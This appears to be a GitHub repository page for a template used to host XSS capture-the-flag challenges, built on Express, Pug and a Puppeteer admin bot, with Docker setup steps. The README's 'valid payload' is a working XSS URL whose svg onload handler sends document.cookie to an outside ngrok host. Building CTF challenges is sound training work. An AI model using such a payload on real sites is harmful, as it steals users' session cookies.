Skip to content
/ xss-node-template Public

Template for creating XSS challenges using Express and Puppeteer

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

diofeher/xss-node-template

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
src
src
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 
solver.py
solver.py
 
 

Repository files navigation

XSS Template

This project is supposed to be a template for XSS challenges if you host CTFs.

Uses express, pug templating system and puppeteer for the admin bot.

Valid payload

http://localhost:4000/?xss=%3Csvg%20onload=%22fetch(%27http://dd77eda6.ngrok.io/?%27%2bdocument.cookie)%22%20/%3E

Running locally

FLAG=FireShell{test} npm start

How to setup

Flag is sent at src/bot.js, it's defined by the environment variable FLAG.

Building the docker image

docker build -t xss .

Running the docker image

docker run --cap-add=SYS_ADMIN -e FLAG=FireShell{test} -p 4000:4000 xss

About

Template for creating XSS challenges using Express and Puppeteer

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages